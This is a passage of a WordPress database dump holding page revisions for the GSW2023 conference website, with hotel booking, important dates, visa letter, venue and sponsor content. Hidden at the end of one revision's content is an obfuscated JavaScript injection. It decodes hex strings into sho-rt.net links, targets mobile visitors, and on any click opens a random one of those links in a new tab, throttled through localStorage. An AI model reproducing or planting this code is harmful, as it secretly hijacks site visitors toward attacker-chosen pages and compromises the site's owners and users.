style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:51:30','2023-06-24 01:51:30','',3066,'https://gsw2023.com/?p=4810',0,'revision','',0),
(4811,1,'2023-06-24 01:53:07','2023-06-24 01:53:07','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px 